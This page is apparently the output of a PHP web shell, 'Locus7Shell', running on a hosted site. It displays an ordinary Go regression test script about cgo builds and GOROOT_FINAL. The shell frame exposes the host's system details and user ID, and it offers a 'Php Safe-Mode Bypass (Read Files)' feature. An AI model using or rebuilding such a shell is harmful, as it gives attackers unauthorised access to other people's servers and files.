![]() | |
---|---|
Software: Apache. PHP/5.4.45 uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue uid=243112(mycochar) gid=100(users) groups=100(users) Safe-mode: OFF (not secure) /home/mycochar/www/image/photo/go/src/cmd/go/testdata/script/ drwxr-xr-x |
Viewing file: Select action/file-type: # Regression test for https://go.dev/issue/48319: # cgo builds should not include debug information from a stale GOROOT_FINAL. [short] skip [!cgo] skip # This test is sensitive to cache invalidation, # so use a separate build cache that we can control. env GOCACHE=$WORK/gocache mkdir $GOCACHE # Build a binary using a specific value of GOROOT_FINAL. env GOROOT_FINAL=$WORK${/}goroot1 go build -o main.exe mv main.exe main1.exe # Now clean the cache and build using a different GOROOT_FINAL. # The resulting binaries should differ in their debug metadata. go clean -cache env GOROOT_FINAL=$WORK${/}goroot2 go build -o main.exe mv main.exe main2.exe ! cmp -q main2.exe main1.exe # Set GOROOT_FINAL back to the first value. # If the build is properly reproducible, the two binaries should match. env GOROOT_FINAL=$WORK${/}goroot1 go build -o main.exe cmp -q main.exe main1.exe -- go.mod -- module main go 1.18 -- main.go -- package main import "C" import "runtime" var _ C.int func main() { println(runtime.GOROOT()) } |
Useful Commands
|
Php Safe-Mode Bypass (Read Files)
|
--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0062 ]-- |